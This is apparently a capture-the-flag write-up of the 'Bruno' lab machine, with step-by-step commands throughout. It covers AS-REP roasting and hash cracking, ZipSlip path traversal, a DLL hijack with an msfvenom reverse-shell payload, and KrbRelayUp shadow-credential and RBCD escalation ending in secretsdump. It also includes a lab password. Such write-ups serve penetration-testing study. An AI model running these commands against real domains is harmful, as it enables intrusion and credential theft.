Bruno involved enumerating ftp shares to find a SampleScanner binary along with a user account which lead to AS-REP roasting, analyzing the binary revealed that it’s vulnerable to path traversal through which DLL hijacking was performed to gain a reverse shell as svc_scan user and then escalating privileges by performing RBCD or shadow credentials through KrbRelayUp.
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
53/tcp open tcpwrapped
80/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
443/tcp open tcpwrapped
88/tcp open kerberos-sec
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Issuer: commonName=bruno-BRUNODC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-29T13:23:01
| Not valid after: 2121-06-29T13:33:00
| MD5: 659b3c9000eb1e0a51701be90456840c
|_SHA-1: a093f4c23c8e053286f21e99cad782f8e40e3d72
445/tcp open tcpwrapped
636/tcp open tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Issuer: commonName=bruno-BRUNODC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T06:05:15
| Not valid after: 2024-08-21T06:05:15
| MD5: 1f78c03b2d8da3ec00765fcc68d5973b
|_SHA-1: be3a109df3cfefcf7a8078654bbbf09ae7950fd5
3269/tcp open tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Issuer: commonName=bruno-BRUNODC-CA
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Issuer: commonName=brunodc.bruno.vlPORT 21 (FTP)
Logging in as an anonymous user on FTP, we can find few directories
From app folder, there's SampleScanner
Reading the changelog file we can see a username svc_scan
Since we are targeting a domain controller, we can check for ASREP roasting (accounts with pre-authentication disabled)
Press enter or click to view image in full size
Having the hash, attempting to crack it against hashcat
hashcat -a 0 -m 18200 ./svc_scan.txt /usr/share/wordlists/rockyou.txt --forcePress enter or click to view image in full size
Listing the shares with this user, we have write access on `queue`
Press enter or click to view image in full size
On this point, we need to understand what sample scanner is doing and what’s the use of this queue share folder, using ILSpy to analyze the SampleScanner.dll
Press enter or click to view image in full size
Gaining Foothold Through DLL Hijacking
This dll looks for a zip file in C:\Samples\queue
, extracts the file and deletes the zip file, if it's not a zip file it
checks for the occurrence of the AV test file pattern defined by the
text string and place it into malicious folder else it places it into
bengin folder, so running this locally by transferring all required
files
Press enter or click to view image in full size
Creating \sample\queue in C:\ and placing a zip file for testing
Press enter or click to view image in full size
Running SampleScanner will extract the contents of the zip file
Press enter or click to view image in full size
Press enter or click to view image in full size
Here we can perform path traversal to extract the file in any location which is known as ZipSlip, for creating a malicious zip file we can use evilarc.py or we can use 7zip to edit the filename to be ..\file.txt
This will extract the contents of evil.zip outside the directory of C:\Samples\queue
Press enter or click to view image in full size
Since this is being ran with svc_scan
we can achieve remote code execution by replacing the dll being used
with SampleScanner, for that we need to analyze which dll we need to
place, with Process Monitor we can analyze which DLL is missing from the program by applying filters for the DLLs which are not found by the exe
Press enter or click to view image in full size
Here we see two DLLs which are being used by this program but are not found in the current path, hostfxr.dll and Microsoft.DiaSymReader.Native.amd64.dll , generating a dll through msfvenom and replacing the DiaSymReader dll
Press enter or click to view image in full size
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.154 LPORT=2222 -f dll > test.dllPress enter or click to view image in full size
Executing SampleScanner now will trigger a reverse shell as we have placed our maclious dll
Press enter or click to view image in full size
To do this on the target machine, we need to place the dll with a path traversal ..\app\Microsoft.DiaSymReader.Native.amd64.dll, since svc_scan has write access to queue share folder we can upload the archive file through smb
Within seconds we’ll receive a connection on our listener
Checking the privileges of svc_scan user, it have any interesting privileges
Press enter or click to view image in full size
Running python-bloodhound to enumerate the domain
python3 bloodhound.py -u 'svc_scan' -p 'Sunshine1' -d 'bruno.vl' -c all -ns 10.10.84.94Get ARZ101’s stories in your inbox
Join Medium for free to get updates from this writer.
Press enter or click to view image in full size
There wasn’t any path leading to domain admin from svc_scan
Press enter or click to view image in full size
However we can see svc_net being AS-REP roastable
Through GetNPUsers.py we can retrieve TGT of svc_net and attempt to crack it
GetNPUsers.py bruno.vl/svc_net -no-pass -dc-ip 10.10.108.253Press enter or click to view image in full size
Press enter or click to view image in full size
Which is the same password as svc_scan, also this user doesn’t didn’t had any special privileges, from winpeas we can see target being vulnerable to KrbRelayU
Press enter or click to view image in full size
Privilege Escalation through Shadow Credentials
To escalate privileges through KrbRelayUp, we need ensure that LDAP singing is disabled and we are allowed to add a machine account, however this is optional as we can abuse shadow credentials if PKINT is supported by DC, through cme we can verify the machine qouta
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maqPress enter or click to view image in full size
Also we can see ldap signing is not enforced
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checkerPress enter or click to view image in full size
For using krbrealyup, we need a valid CLSID, for that I grabbed one from the updated list of working CLSIDs from here
Press enter or click to view image in full size
Using the shadow credentials method on port 10246, as this was the port which was available
.\KrbRelayUp.exe full -m shadowcred -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 1024Press enter or click to view image in full size
Using Rubeus, to request a TGT for brunodc through PKINT authentication
Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSAIBAzCCCgQGC...snip.... /password:tV0-oN8$aB7- /enctype:AES256 /nowrapPress enter or click to view image in full size
Converting the kirbi format to ccache so we can use it with secretsdump.py
Press enter or click to view image in full size
secretsdump.py 'brunodc$'@brunodc.bruno.vl -k -no-passPress enter or click to view image in full size
Press enter or click to view image in full size
Privilege Escalation through Resource Based Constrained Delegation (RBCD)
We can also perform Resource Based Constrained Delegation (RBCD) by creating machine account and that account in brunodc’s msDS-AllowedToActOnBehalfOfOtherIdentity property
.\KrbRelayUp.exe full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246Press enter or click to view image in full size
Requesting the administrator’s TGT through getST.py
Press enter or click to view image in full size
Having the ticket, we can login through smbexec.py
References
- https://github.com/ptoomey3/evilarc
- https://github.com/cesarsotovalero/zip-slip-exploit-example/blob/master/README.md
- https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html
- https://github.com/Dec0ne/KrbRelayUp
- https://vulndev.io/cheats-windows/
- http://ohpe.it/juicy-potato/CLSID/